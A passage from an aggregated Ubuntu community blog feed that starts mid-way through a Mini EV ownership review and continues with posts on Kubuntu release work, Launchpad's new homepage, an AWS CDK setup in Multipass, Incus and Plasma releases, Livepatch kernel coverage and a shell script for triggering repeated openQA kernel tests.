The Mini is sold with only one battery option, a 30 kWh capacity with an estimated 140-mile range. There’s a CCS (Combined Charging System (combo 2)) socket under a flap on the rear (right) driver’s side. So it can do slower AC charging or faster DC charging.

The car has all the cables required for charging from a 13-amp socket at home or a 7 kW domestic or public “slow” charger. Faster public chargers have integrated fat cables.

A few days before the car arrived, I had a charger installed at home on the outside wall of the house. I’m fortunate to have a driveway at the front of the house. So I typically park the car on it and plug in when I get out.

Sometimes, I forget or don’t bother if I know the battery still has plenty of charge and I do not have any upcoming long journeys. But more often than not, I try always to plug it in, even if it won’t be charging until the next day.

Charging

In my personal experience, most charges are done at home. I have charged in many places away from home, but that’s not very common for me. The last time I checked the stats, it had been around 86% charging at home and 14% on public chargers.

I often take a photo of the car while it’s charging in a public place. Usually to share on social media to spark a conversation about charging infrastructure. On this occasion I was using a charger in the car park at Chepstow Castle.

I know petrol heads often bleat about the very idea of waiting while the car fills up, but sometimes it leads to nice places, like this. This was a pretty slow charger, but I didn’t really care, as I had a castle to walk around!

Dragon charging

Sometimes the locations are less pretty. This is Chippenham Pit-Stop, which does a great breakfast while you wait for your car to charge.

Chippenham charging

Ohme at HOME

My home charger is made by Ohme. It has a display and a few weatherproof buttons to be directly operated without needing an app. However, a few additional features are only available if the app is installed.

The Ohme app can access my energy provider via an API, which lets the charger know the optimal time, from a pricing perspective, to start charging the car. That seems to work well with Octopus Energy, my domestic provider.

It’s possible to define multiple charging schedules to ensure the car is ready for departure at the time you’re leaving.

Ohme

The Ohme app is also supposed to be able to talk to the BMW API with my credentials, in order to talk to the car. This has never worked for me. I have had calls and emails with Ohme about this, but I gave up in frustration. It just doesn’t work.

That doesn’t stop the car from actually charging though. Indeed, according to the stats in the app (which I only discovered while writing this blog) - I’ve charged for over 720 hours at home in the last twelve months. The dip in November & December is explained below under “Crash repair”.

Ohme stats

Issues

There are a few issues I’ve had with the car.

App registration

The car has its own mobile connectivity, and talks to BMW periodically. But for that to work, you have to successfully pair the car with your phone app. The pairing process between the mobile app and the car itself should just be a case of entering the Vehicle Identification Number in the app. Sadly this didn’t work. I don’t know what was wrong, but it took around two weeks for it to be fixed.

Home Sweet Home

The onboard navigation system had my address wrong. The house number it showed for my home doesn’t exist, and mine wasn’t in the database. The house has been here and numbered correctly for over 50 years. It was only a minor thing because I happened to know where I lived, and how to get there. It just irritated me that my own car, on my driveway, thought it was somewhere else.

I called Mini customer services and they didn’t seem to think it was easily fixable, saying I should just hope for a map update.

So I did the nerd thing, and found out who the map supplier was - “Nokia Here” - and submitted a request to fix the data there. Later, I got a map update from BMW which contained my fix. That’s one way to do it.

Unable to charge

Within a year of owning the car, it stopped charging at home. The AC charging port just wouldn’t work. I could charge at the fast public DC chargers nearby, but my home charger stopped working.

Unable to charge

When I reported the problem to BMW, their assumption was that the wall box on my house was broken. We disproved this by showing a different car charging from the home wall box, and my car refusing to charge from public AC chargers.

The BMW dealership were still very reluctant to accept that there was a problem with the car. I had to drive it to the dealership and put the car on their own slow charger to show them it failing to charge. Only once I’d done that did they allow me to book it in for repair the next day.

In a bit of a dick move, I drove around to empty the battery completely, rocking up to the dealership with the car angrily telling me it had 0% charge. That way, they’d have to fix the charging in order to get the car back to me. They did indeed fix the problem with the charging system, which took quite a while.

Zero

I got a rather fancy BMW i7 on loan while they repaired the car.

When I went to pick the car up, they were very apologetic that it took so long and gave me a bag of Mini merch as a gift. When I went to open the boot to put the bag away, I noticed that there was a panel unclipped and some disconnected wires dangling around in the boot. I had to call someone from the garage over to fix it before I could drive away.

I was a little sad that the car clearly hadn’t been fully checked over before I was given it back.

Unplugging

During cold weather in Winter, the charger plug sometimes gets stuck - frozen - into the socket. This can be quite frustrating as it’s impossible to set off to work while the cable is still attached to the house! I found some plumber grease which I smeared around the plug in the hope of lubricating and reducing the ingress or condensation of water. So far, that’s helped.

I took a wrong turn down a long A-road one night, which meant I didn’t have sufficient charge to get home without stopping to top up. I thought I’d try the internal navigation system, which has a database of charging stations.

The first location it took me to was a hotel. I drove around the car park and couldn’t find a charger at all. Not necessarily the navigation system’s fault, but the hotel signage, to be fair. I gave up, and chose the next nearest charger on the map. It confidently took me down some narrow lanes and stopped at a closed gate which was the entrance to a farm. It looked to me like a private residence.

I gave up and switched to an app on my phone, and ended up at a nearby Tesla charging station where there were many free spaces, and I was able to charge with ease. It possibly should have offered me that one first!

App nagging

As I mentioned above, there is a Mini app for Android and iOS for managing the car. In it you can do some simple things like lock and unlock the car, turn the lights on, and enable the climate control before setting off. It also has a record of charging sessions, a map for finding chargers, and other useful information like locating the car, and showing battery charge level and estimated range.

It nags you constantly to tell them how great or bad the app is and, inexplicably, on a scale of 0 to 10, whether you’d recommend it to friends or colleagues. I cannot fathom the kind of person who recommends apps to friends who don’t own the car the app is for. It’s completely mental.

Rating

Every time the dialog comes up - and it’s come up a lot - I rate the app zero, and leave an increasingly irritated message to the developers to stop asking me. I have also filed a ticket with BMW. Their engineers came back to me with details of exactly how often it asks, based on how often you open the app, and the interval between one opening and the next.

You can’t turn this off. It’s super irritating, and I still get asked two years later. I still give it a zero, despite the app having some useful features.

Full flaps

The charge port is covered by a hinged flap, just like in a petrol car. The Mini recently started nagging me that the flap was open when it wasn’t. No amount of opening and closing would stop the car nagging me. Thankfully it still let me drive with a little warning triangle on screen. I let the dealership know, and they fixed it during the upcoming maintenance.

Crash repair

In November my wife was involved in a crash when someone pulled out in front of her from behind traffic. She was only slightly injured, and the car was structurally fine, but a bit smashed up at the front. The other driver was at fault, and it was all sorted out via insurance. The local BMW-approved repair centre had the car from November to January while I had a hire car on loan. The car came back as good as new.

No spare tyre

It’s a small car, so there’s no room for a spare wheel. I had a puncture recently and managed to limp the car back home. I pressed the SOS button in the car and got put through to a friendly agent.

They organised a BMW engineer to come out and change the wheel. He arrived very quickly, jumped out of his van and took the wheel off my car, replacing it with a spare he had in the van.

He then put my wheel in the boot of my car and asked me to let him know by text once I’d got mine fixed, so he could pick his spare up again. I got it fixed within a day or so, and left his spare somewhere safe, as I was out at work. He happily came and collected it. I was pretty pleased with this whole experience.

Maintenance

As I got closer to the two-year anniversary of ownership, the app started to remind me to book the car for a service. There’s a feature in the app to just press a button, and get taken to a page where you can book the car in. The links are all broken and always have been. I don’t have the energy to call BMW to tell them it’s all broken. They should do better QA on the app.

Eventually I just called the garage to get the car maintained. There was a scheduled two-year inspection, a low priority recall, brake check and my broken ‘fuel flap’ to fix. They had the car all day and everything was complete when I picked it up at the end of the day.

The fact that an EV has no oil changes, oil filter replacements, spark plug replacements, timing chains/belts, or many of the other parts that commonly fail is quite attractive. But there’s still a regular service which needs doing.

Some argue that because the car has a one-pedal driving mode, where regenerative braking slows the car down, drivers are less likely to wear out the brakes. However, I’ve also seen it asserted that some cars actually use both regenerative braking and the physical disc brakes without letting the driver know. I have no idea whether the Mini “smartly” applies the brakes, or if it only does so when I press the brake pedal.

Conclusion

I love the Mini EV. I love driving it, and often make excuses to drive somewhere, or I’ll go the ‘long way round’ in order to spend more time in it. It’s not perfect, but it’s super fun to drive.

As for it being my first EV. While the network of public EV chargers isn’t amazing, there’s enough where I live and travel to service my requirements. I don’t think I’ll go back to a petrol car anytime soon.

We’re also considering replacing the wife’s car soon, and will look at electric options for that too.

There’s a new refreshed Mini model out, which the local dealership salespeople seem keen for me to test drive. Having seen it on video, but not in person, I’m not convinced I’ll like it. We’ll see.

on March 03, 2024 12:00 PM

March 01, 2024

First I would like to give a big congratulations to KDE for a superb KDE 6 mega release 🙂 While we couldn’t go with 6 on our upcoming LTS release, I do recommend KDE neon if you want to give it a try! I want to say it again: I firmly stand by the Kubuntu Council in the decision to stay with the rock-solid Plasma 5 for the 24.04 LTS release. The timing was just too close to feature freeze, and the last time we went with the shiny new stuff on an LTS release, it was a nightmare (KDE 4, anyone?). So without further ado, my weekly wrap-up.

Kubuntu:

Continuing efforts from last week (Kubuntu: Week 3 wrap up, Contest! KDE snaps, Debian uploads), it has been another wild and crazy week getting everything in before feature freeze yesterday. We will still be uploading the upcoming Plasma 5.27.11, as it is a bugfix release 🙂 and right now it is all about finding and fixing bugs! Aside from many uploads, my accomplishments this week are:

  • Kept a close eye on Excuses and fixed tests as needed. Seems riscv64 tests were turned off by default which broke several of our builds.
  • I did a complete revamp of our seed / kubuntu-desktop meta package! I have ensured we are following KDE packaging recommendations. Unfortunately, we cannot ship maliit-keyboard as we get hit by LP 2039721 which makes for an unpleasant experience.
  • I did some more work on our custom plasma-welcome which now just needs some branding, which leads to a friendly reminder the contest is still open! https://kubuntu.org/news/kubuntu-graphic-design-contest/
  • Bug triage! Oh so many bugs! Some date back to when I worked on Kubuntu 10 years ago and Plasma 5 was new. I am triaging and reducing this list to more recent bugs (which is a much smaller list). This reaffirms our decision to go with a rock-solid, stable Plasma 5 for this LTS release.
  • I spent some time debugging kio-gdrive, which no longer works (it works in Jammy), so I am tracking down what is broken. I thought it was 2FA, but my non-2FA account doesn’t work either; it just repeatedly throws up the Google auth dialog. So this is still a WIP. It was suggested to me to disable online accounts altogether, but I would prefer to give users the full experience.
  • Fixed our ISO builds. We are still not quite ready for testers as we have some Calamares fixes in the pipeline. Be on the lookout for a call for testers soon 🙂
  • Wrote a script to update our ( Kubuntu ) packageset to cover all the new packages accumulated over the years and remove packages that are defunct / removed.

What comes next? Testing, testing, testing! Bug fixes and of course our re-branding. My focus is on bug triage right now. I am also working on new projects in launchpad to easily track our bugs as right now they are all over the place and hard to track down.

Snaps:

I have started the MRs to fix our latest 23.08.5 snaps, I hope to get these finished in the next week or so. I have also been speaking to a prospective student with some GSOC ideas that I really like and will mentor, hopefully we are not too late.

Happy with my work? My continued employment depends on you! Please consider a donation http://kubuntu.org/donate

Thank you!

on March 01, 2024 04:38 PM

Launchpad’s new homepage

Launchpad has been around for a while, and its frontpage has remained untouched for a few years now.

If you go to launchpad.net, you’ll notice it looks quite different from what it has looked like for the past 10 years – it has been updated! The goal was to modernize it while trying to keep it looking like Launchpad. The contents have remained the same with only a few text additions, but there were a lot of styling changes.

The most relevant change is that the frontpage now uses Vanilla components (https://vanillaframework.io/docs). This alone not only made the layout look more modern, but also made it better for a new curious user reaching the page from a mobile device. The accessibility score of the page – calculated with Google’s Lighthouse extension – increased from a 75 to an almost perfect 98!

Given the frontpage is so often the first impression users get when they want to check out Launchpad, we started there. But in the future, we envision the rest of Launchpad looking more modern and having a more intuitive UX.

As a final note, thank you to Peter Makowski for always giving a helping hand with frontend changes in Launchpad.

If you have any feedback for us, don’t forget to reach out in any of our channels. For feature requests you can reach us at feedback@launchpad.net or open a report in https://bugs.launchpad.net/launchpad.

To conclude this post, here is what Launchpad looked like in 2006, yesterday and today.


Launchpad in 2006

Launchpad yesterday

Launchpad today

on March 01, 2024 01:55 PM

February 25, 2024

I want to be able to connect to the environment using Visual Studio Code, so first we need to create an SSH key:

ssh-keygen -t rsa

We need a cloud-init configuration YAML, saved as cloud-init.yaml; replace <generated ssh-rsa key> with the public key generated above (the contents of ~/.ssh/id_rsa.pub):

groups:
  - vscode
runcmd:
  - adduser ubuntu vscode
ssh_authorized_keys:
  - ssh-rsa <generated ssh-rsa key>

Assuming you’ve got Multipass installed (if not sudo snap install multipass) then:

multipass launch mantic --name ubuntu-cdk --cloud-init cloud-init.yaml

We’ll come back to Visual Studio Code later, but first let’s set everything up in the VM. We need to install aws-cli, which I want to use with SSO (hence why we installed Mantic).

multipass shell ubuntu-cdk
sudo apt install awscli
aws configure sso

Follow the prompts and sign in to AWS as usual. Then install CDK:

sudo apt install nodejs npm
sudo npm install -g aws-cdk
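Before bootstrapping, it may be worth confirming that the SSO session actually works; a quick sketch, using the profile name you chose during aws configure sso:

aws sts get-caller-identity --profile <profile>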

Almost there; let’s bootstrap1 (provisioning the resources needed to make deployments), substituting the relevant values:

cdk bootstrap aws://<account>/<region> --profile <profile>

You should see a screen like this:

Create a new CDK application by creating a new folder, changing into it and initialising CDK:

mkdir cdk-app && cd cdk-app  # any folder name works; cdk-app is just an example
cdk init app --language python
source .venv/bin/activate
python -m pip install -r requirements.txt
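At this point the skeleton app should synthesise cleanly; a quick sanity check (deploying is optional here, since the generated stack is still empty):

cdk synth
cdk deploy --profile <profile>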

And that’s about it, except for Visual Studio Code. You’ll need to install Microsoft’s Remote-SSH extension:

You can get the IP address from multipass list, then in Code add a new SSH connection using ubuntu@<ip>:

Accept the various options presented and you’re there!

VSCode
  1. Bootstrapping provisions resources in your environment such as an Amazon Simple Storage Service (Amazon S3) bucket for storing files and AWS Identity and Access Management (IAM) roles that grant permissions needed to perform deployments. These resources get provisioned in an AWS CloudFormation stack, called the bootstrap stack. It is usually named CDKToolkit. Like any AWS CloudFormation stack, it will appear in the AWS CloudFormation console of your environment once it has been deployed. ↩
on February 25, 2024 10:01 PM

Plasma Pass 1.2.2

Jonathan Riddell

Plasma Pass is a Plasma applet for the Pass password manager

This release includes build fixes for Plasma 6, due to be released later this week.

URL: https://download.kde.org/stable/plasma-pass/
Sha256: 2a726455084d7806fe78bc8aa6222a44f328b6063479f8b7afc3692e18c397ce
Signed by E0A3EB202F8E57528E13E72FD7574483BB57B18D Jonathan Esk-Riddell <jr@jriddell.org>
https://jriddell.org/esk-riddell.gpg

on February 25, 2024 11:57 AM

February 23, 2024

As we get to the close of February 2024, we’re also getting close to Feature Freeze for Ubuntu Studio 24.04 LTS and, therefore, a closer look at what Ubuntu Studio 24.04 LTS will look like!

Before we get to that, however, we do want to let everyone know that community donations are down. We understand these are trying times for us all, and we just want to remind everyone that the creation and maintenance of Ubuntu Studio does come at some expense, such as electricity, internet, and equipment costs. All of that is in addition to the tireless hours our project leader, Erich Eickmeyer, is putting into this project daily.

Additionally, some recurring donations are failing. We’re not sure if they’re due to expired payment methods or inadequate funds, but we have no way to reach the people whose recurring donations have failed other than this method. So, if you have received any kind of notice, we kindly ask that you would check to see why those donations are failing. If you’d like to cancel, then that’s not a problem either.

If you find Ubuntu Studio useful or agree with its mission, we ask that you contribute a donation or subscribe using one of the methods below.

Ubuntu Studio Will Always Remain a Free Download. That Will Not Change. The work that goes into producing it, however, is not free, and for that reason, we ask for voluntary donations.

  • Donate using PayPal (donations are monthly or one-time)
  • Donate using Liberapay (donations are weekly, monthly, or annually)
  • Become a Patron on Patreon (donations are monthly)


The New Installer

Progress has been made on the new installer, and for a while, it was working. However, at this time, the code is entirely in the hands of the Ubuntu Desktop Team at Canonical and we at Ubuntu Studio have no control over it.

This is currently where it gets stuck. We have no control over this at present.

Additionally, while we do appreciate testing, no amount of testing or bug reporting will fix this, so we ask that you be patient.

Wallpaper Competition

Our Wallpaper Competition for Ubuntu Studio 24.04 LTS is underway! We’ve received a handful of submissions but would love to see more!

Moving from IRC back to Matrix

Our support chat is moving back from IRC to Matrix! As you may recall, we had a Matrix room as our support chat until recently. However, the entire Ubuntu community has now begun a migration to Matrix for our communication needs, and Ubuntu Studio will be following. Stay tuned for more information about that; the links on our website will also be changing, and the menu links will default to Matrix in Ubuntu Studio 24.04 LTS’s release.

PulseAudio-Jack/Studio Controls Deprecation

Beginning in Ubuntu Studio 24.04 LTS, the old PulseAudio-JACK bridging/configuration, while still installable and usable with Studio Controls, will no longer be supported and will not be recommended for use. For most people, the default configuration, using PipeWire with the PipeWire-JACK configuration enabled, will suffice; it can be disabled on the fly if one wishes to use JACKd2 with QJackCtl.

While Studio Controls started out as our in-house-built Ubuntu Studio Controls, it is no longer needed, as its functionality has largely been replaced by the full low-latency audio integration and bridging that PipeWire provides.


With that, we hope our next update will provide you with better news regarding the installer, so keep your eyes on this space!

on February 23, 2024 10:48 PM

Announcing Incus 0.6

Stéphane Graber

Looking for something to do this weekend? How about trying out the all new Incus 0.6!

This Incus release is quite a feature-packed one! It comes with an all-new storage driver that allows a shared disk to be used for storage across a cluster. On top of that, we also have support for backing up and restoring storage buckets, control over access to shared block devices, the ability to list images across all projects, a number of OVN improvements, and more!

The full announcement and changelog can be found here.
And for those who prefer videos, here’s the release overview video:

You can take the latest release of Incus up for a spin through our online demo service at: https://linuxcontainers.org/incus/try-it/

And as always, my company is offering commercial support on Incus, ranging from by-the-hour support contracts to one-off services on things like initial migration from LXD, review of your deployment to squeeze the most out of Incus or even feature sponsorship. You’ll find all details of that here: https://zabbly.com/incus

Donations towards my work on this and other open source projects are also always appreciated; you can find me on GitHub Sponsors, Patreon and Ko-fi.

Enjoy!

on February 23, 2024 10:17 PM
Witch Wells AZ Sunset

It has been a very busy 3 weeks here in Kubuntu!

Kubuntu 22.04.4 LTS has been released and can be downloaded from here: https://kubuntu.org/getkubuntu/

Work done for the upcoming 24.04 LTS release:

  • Frameworks 5.115 is in proposed waiting for the Qt transition to complete.
  • Debian merges for Plasma 5.27.10 are done, and I have confirmed there will be another bugfix release on March 6th.
  • Applications 23.08.5 is being worked on right now.
  • Added support for riscv64 hardware.
  • Bug triaging and several fixes!
  • I am working on Kubuntu branded Plasma-Welcome, Orca support and much more!
  • Aaron and the Kfocus team have been doing some amazing work getting Calamares perfected for release! Thank you!
  • Rick has been working hard on revamping kubuntu.org, stay tuned! Thank you!
  • I have added several more apparmor profiles for packages affected by https://bugs.launchpad.net/ubuntu/+source/kgeotag/+bug/2046844
  • I have aligned our meta package to adhere to https://community.kde.org/Distributions/Packaging_Recommendations and will continue to apply the rest of the fixes suggested there. Thanks for the tip Nate!

We have a branding contest! Please do enter, there are some exciting prizes https://kubuntu.org/news/kubuntu-graphic-design-contest/

Debian:

I have uploaded to NEW the following packages:

  • kde-inotify-survey
  • plank-player
  • aura-browser

I am currently working on:

  • alligator
  • xwaylandvideobridge

KDE Snaps:

KDE applications 23.08.5 have been uploaded to the Candidate channel; testing help is welcome: https://snapcraft.io/search?q=KDE I have also been working on bug fixes, time allowing.

My continued employment depends on you, please consider a donation! https://kubuntu.org/donate/

Thank you for stopping by!

~Scarlett

on February 23, 2024 11:42 AM

February 22, 2024

Thanks to all the hard work from our contributors, Lubuntu 22.04.4 LTS has been released. With the codename Jammy Jellyfish, Lubuntu 22.04 is the 22nd release of Lubuntu, the eighth release of Lubuntu with LXQt as the default desktop environment. Support lifespan Lubuntu 22.04 LTS will be supported for 3 years until April 2025. Our […]
on February 22, 2024 08:23 PM

We are pleased to announce the release of the next version of our distro, the fourth 22.04 LTS point release. The LTS version is supported for 3 years while the regular releases are supported for 9 months. The new release rolls up various fixes and optimizations by the Ubuntu Budgie team that have been released since the 22.04.3 release in August: For the adventurous among our community we…

Source

on February 22, 2024 06:15 PM

February 21, 2024

Oxygen Icons 6 Released

Jonathan Riddell

Oxygen Icons is an icon theme for use with any XDG compliant app and desktop.

It is part of KDE Frameworks 6 but is now released independently to save on resources.

This 6.0.0 release requires building with extra-cmake-modules from KF 6, which is not yet released; distros may want to wait until next week before building it.

Distros which ship this version can drop the version released as part of KDE Frameworks 5.

sha256: 28ec182875dcc15d9278f45ced11026aa392476f1f454871b9e2c837008e5774

URL: https://download.kde.org/stable/oxygen-icons/

Signed by E0A3EB202F8E57528E13E72FD7574483BB57B18D Jonathan Esk-Riddell <jr@jriddell.org>
https://jriddell.org/esk-riddell.gpg

on February 21, 2024 10:20 AM

January 30, 2024

There’s a YouTube channel called Clickspring, run by an Australian bloke called Chris who is a machinist: a mechanical engineer with a lathe and a mill and all manner of little tools. I am not a machinist — at school I was fairly inept at what we called CDT, for Craft Design and Technology, and what Americans much more prosaically call “shop class”. My dad was, though, or an engineer at least. Although Chris builds clocks and beautiful brass mechanisms, and my dad built aeroplanes. Heavy engineering. All my engineering is software, which actual engineers don’t think is engineering at all, and most of the time I don’t either.

You can romanticise it: claim that software development isn’t craft, it’s art. And there is a measure of truth in this. It’s like writing, which is the other thing I spend a lot of time doing for money; that’s an art, too.

If you’re doing it right, at least.

Most of the writing that’s done, though, isn’t art. And most of the software development isn’t, either. Or most of the engineering. For every one person creating beauty in prose or code or steel, there are fifty just there doing the job with no emotional investment in what they’re doing at all. Honestly, that’s probably a good thing, and not a complaint. While I might like the theoretical idea of a world where everything is hand made by someone who cares, I don’t think that you should have to care in order to get paid. The people who are paying you don’t care, so you shouldn’t have to either.

It’s nice if you can swing it so you get both, though.

The problem is that it’s not possible to instruct someone to give a damn. You can’t regulate the UK government into giving a damn about people who fled a war to come here to find their dream of being a nurse, you can’t regulate Apple bosses into giving a damn about the open web, you can’t regulate CEOs into giving a damn about their employees or governments about their citizens or landlords about their tenants. That’s not what regulation is for; people who give a damn largely don’t need regulation because they want to do the right thing. They might need a little steering into knowing what the right thing is, but that’s not the same.

No, regulation is there as a reluctant compromise: since you can’t make people care, the best you can do is in some rough and ready fashion make them behave in a similar way to the way they would if they did. Of course, this is why the most insidious kind of response is not an attempt to evade responsibility but an attack on the system of regulation itself. Call judges saboteurs or protesters criminals or insurgents patriots. And why the most heinous betrayal is one done in the name of the very thing you’re destroying. Claim to represent the will of the people while hurting those people. Claim to be defending the law while hiding violence and murder behind a badge. Claim privacy as a shield for surveillance or for exclusion. We all sorta thought that the system could protect us, that those with the power could be trusted to use it at least a little responsibly. And the last year has been one more in a succession of years demonstrating just how wrong that is. This and no other is the root from which a tyrant springs; when he first appears he is a protector.

The worst thing about it is that the urge to protect other people is not only real but the best thing about ourselves. When it’s actually real. Look after others, especially those who need it, and look after yourself, because you’re one of the people who needs it.

Chris from Clickspring polishes things to a high shine using tin, which surprised me. I thought bringing out the beauty in something needed a soft cloth but no, it’s done with metal. Some things, like silver, are basically shiny with almost no effort; there’s a reason people have prized silver things since before we could even write down why, and it’s not just because you could find lumps of it lying around the place with no need to build a smelting furnace. Silver looks good, and makes you look good in turn. Tin is useful, and it helps polish other things to a high shine.

Today’s my 48th birthday. A highly composite number. The ways Torah wisdom is acquired. And somewhere between silver and tin. That sounds OK to me.

on January 30, 2024 09:50 PM

January 25, 2024

Linux kernel getting a livepatch whilst running a marathon. Generated with AI.

Livepatch service eliminates the need for unplanned maintenance windows for high and critical severity kernel vulnerabilities by patching the Linux kernel while the system runs. Originally the service launched in 2016 with just a single kernel flavour supported.

Over the years, additional kernels were added: new LTS releases, ESM kernels, Public Cloud kernels, and most recently HWE kernels too.

Recently, livepatch support was expanded to FIPS-compliant kernels, public cloud FIPS-compliant kernels, and IBM Z (mainframe) kernels, bringing the total to over 60 distinct kernel flavours supported in parallel. The table of supported kernels in the documentation lists the supported kernel flavours and ABIs, the duration of each build's support window, the supported architectures, and the Ubuntu release. This work was only possible thanks to collaboration with the Ubuntu Certified Public Cloud team, engineers at IBM for IBM Z (s390x) support, the Ubuntu Pro team, and the Livepatch server & client teams.

It is a great milestone, and I personally enjoy seeing the non-intrusive popup on my Ubuntu Desktop that a kernel livepatch was applied to my running system. I do enable Ubuntu Pro on my personal laptop thanks to the free Ubuntu Pro subscription for individuals.
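
For anyone who wants to try this, enabling Livepatch on an Ubuntu machine with an Ubuntu Pro subscription looks roughly like the following; the attach token placeholder below comes from your Ubuntu Pro account page:

```bash
# Attach this machine to your Ubuntu Pro subscription
sudo pro attach <your-token>

# Enable the Livepatch service
sudo pro enable livepatch

# Show which livepatches, if any, are applied to the running kernel
canonical-livepatch status --verbose
```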

What's next? The next frontier is supporting ARM64 kernels. The Canonical kernel team has completed the gap analysis to start supporting Livepatch Service for ARM64. Upstream Linux requires development work on the consistency model to fully support livepatch on ARM64 processors. Livepatch code changes are applied on a per-task basis, when the task is deemed safe to switch over. This safety check depends mostly on kernel stacktraces. For these checks, CONFIG_HAVE_RELIABLE_STACKTRACE needs to be available in the upstream ARM64 kernel. (see The Linux Kernel Documentation). There are preliminary patches that enable reliable stacktraces on ARM64, however these turned out to be problematic as there are lots of fix revisions that came after the initial patchset that AWS ships with 5.10. This is a call for help from any interested parties. If you have engineering resources and are interested in bringing Livepatch Service to your ARM64 platforms, please reach out to the Canonical Kernel team on the public Ubuntu Matrix, Discourse, and mailing list. If you want to chat in person, see you at FOSDEM next weekend.
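
As a quick aside, you can check whether a given kernel build enables the option in question by grepping its config, which on Ubuntu ships under /boot:

```bash
# Prints CONFIG_HAVE_RELIABLE_STACKTRACE=y if the running kernel has it
grep HAVE_RELIABLE_STACKTRACE /boot/config-"$(uname -r)"
```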

on January 25, 2024 06:01 PM
Lubuntu 23.04 has reached end-of-life as of today, January 25, 2024. It will no longer receive software updates (including security fixes) or technical support. All users are urged to upgrade to Lubuntu 23.10 as soon as possible to stay secure. You can upgrade to Lubuntu 23.10 without reinstalling Lubuntu from scratch by following the official […]
on January 25, 2024 04:18 PM

This is a follow up to my previous post about How to test things with openQA without running your own instance, so you might want to read that first.

Now, while hunting for bsc#1219073, which is quite sporadic and took quite some time to show up often enough to become noticeable and traceable, the stars eventually aligned and I managed to find a way to get a higher failure rate. At that point I wanted a way for me and for the developer to test the kernel with the different patches, to help with the bisecting and to ease the process of finding the culprit and a solution for it.

I came up with a fairly simple solution, using the --repeat parameter of the openqa-cli tool and a simple shell script to run it:

```bash
$ cat ~/Downloads/trigger-kernel-openqa-mdadm.sh
# the kernel repo must be the one without https; tests don't have the kernel CA installed
KERNEL="KOTD_REPO=http://download.opensuse.org/repositories/Kernel:/linux-next/standard/"

REPEAT="--repeat 100" # using 100 by default
JOBS="https://openqa.your.instan.ce/tests/13311283 https://openqa.your.instan.ce/tests/13311263 https://openqa.your.instan.ce/tests/13311276 https://openqa.your.instan.ce/tests/13311278"
BUILD="bsc1219073"
for JOB in $JOBS; do 
	openqa-clone-job --within-instance $JOB CASEDIR=https://github.com/foursixnine/os-autoinst-distri-opensuse.git#tellmewhy ${REPEAT} \
		_GROUP=DEVELOPERS ${KERNEL} BUILD=${BUILD} FORCE_SERIAL_TERMINAL=1\
		TEST="${BUILD}_checkmdadm" YAML_SCHEDULE=schedule/qam/QR/15-SP5/textmode/textmode-skip-registration-extra.yaml INSTALLONLY=0 DESKTOP=textmode\
		|& tee jobs-launched.list;
done;
```

There are a few things to note here:

  • the kernel repo must be the one without https; tests don’t have the CA installed by default.
  • the --repeat parameter is set to 100 by default, but can be changed to whatever number is desired.
  • the JOBS variable contains the list of jobs to clone and run; having all supported architectures is recommended (at least for this case)
  • the BUILD variable can be anything, but it’s recommended to use the bug number or something that makes sense.
  • the TEST variable sets the name of the test as it will show up in the test overview page. You can use TEST+=foo if you want to append text instead of overriding it; the --repeat parameter will append a number incrementally to your test, see os-autoinst/openQA#5331 for more details.
  • the YAML_SCHEDULE variable sets the yaml schedule to use; there are other ways to modify the schedule, but in this case I want to perform a full installation

Running the script

  • Ensure you can run at least the openQA client; if you need API keys, see the post linked at the beginning of this post
  • Replace the kernel repo with your branch in line 5 of the script
  • Run the script with $ bash trigger-kernel-openqa-mdadm.sh and you should get the following output (times the --repeat value, if you modified it):
1 job has been created:
 - sle-15-SP5-Full-QR-x86_64-Build134.5-skip_registration+workaround_modules@64bit -> https://openqa.your.instan.ce/tests/13345270

Each URL is a job triggered in openQA. Depending on the load and the amount of jobs, you might need to wait quite a bit (some users can help move the priority of these jobs up so they execute faster).
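
If you would rather poll from the command line than refresh the web UI, the same openqa-cli tool can query a job's state; a small sketch, assuming jq is installed and reusing the placeholder host from the script above:

```bash
# Query the state and result of a single job by its ID
openqa-cli api --host https://openqa.your.instan.ce jobs/13345270 | jq '.job | {state, result}'
```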

The review stuff:

Looking at the results

  • Go to https://openqa.your.instan.ce/tests/overview?distri=sle&build=bsc1219073&version=15-SP5, or from any job in the list above click on the Job groups menu at the top and select Build bsc1219073
  • Click on “Filter”
  • Type the name of the test module to filter by in the Module name field, e.g. mdadm, and select the desired result of that test module, e.g. failed (you can also type and select multiple result types)
  • Click Apply
  • The overall summary of the build overview page will provide you with enough information to calculate the pass/fail rate.

A rule of thumb: anything above 5% is bad, but you need to also understand your sample size + the setup you’re using; YMMV.

Ain’t nobody got time to wait

The script will generate a file called jobs-launched.list. In case you absolutely need to change the priority of the jobs, set it to 45 so they run at higher than the default priority, which is 50:

cat jobs-launched.list | grep https | sed -E 's/^.*->\s.*tests\///' | xargs -r -I {} bash -c "openqa-cli api --osd -X POST jobs/{}/prio prio=45; sleep 1"

The magic

The actual magic is in the schedule: right after booting the system and setting it up, before running the mdadm test, I inserted the update_kernel module, which adds the kernel repo specified by KOTD_REPO, installs the kernel from there, reboots the system, and leaves it ready for the actual test. However, I had to make some very small changes:

---
 tests/kernel/update_kernel.pm | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/tests/kernel/update_kernel.pm b/tests/kernel/update_kernel.pm
index 1d6312bee0dc..048da593f68f 100644
--- a/tests/kernel/update_kernel.pm
+++ b/tests/kernel/update_kernel.pm
@@ -398,7 +398,7 @@ sub boot_to_console {
 sub run {
     my $self = shift;
 
-    if ((is_ipmi && get_var('LTP_BAREMETAL')) || is_transactional) {
+    if ((is_ipmi && get_var('LTP_BAREMETAL')) || is_transactional || get_var('FORCE_SERIAL_TERMINAL')) {
         # System is already booted after installation, just switch terminal
         select_serial_terminal;
     } else {
@@ -476,7 +476,7 @@ sub run {
         reboot_on_changes;
     } elsif (!get_var('KGRAFT')) {
         power_action('reboot', textmode => 1);
-        $self->wait_boot if get_var('LTP_BAREMETAL');
+        $self->wait_boot if (get_var('FORCE_SERIAL_TERMINAL') || get_var('LTP_BAREMETAL'));
     }
 }
 

Likely I’ll make a new pull request to have this in the test distribution, but for now this is good enough to help kernel developers do some self-service and trigger their own openQA tests, which run many more tests (hopefully in parallel) and faster than if a person were doing all of this manually.

Special thanks to the QE Kernel team, who do the amazing job of thinking of some scenarios like this, because they save a lot of time.

on January 25, 2024 12:00 AM

January 22, 2024

Users can now add their Matrix accounts to their profile in Launchpad, as requested by Canonical’s Community team.

We also took the chance to slightly rework the frontend and how we display social accounts in user profiles. Instead of having a different profile section for each social account, all social accounts are now under a single “Social Accounts” section.

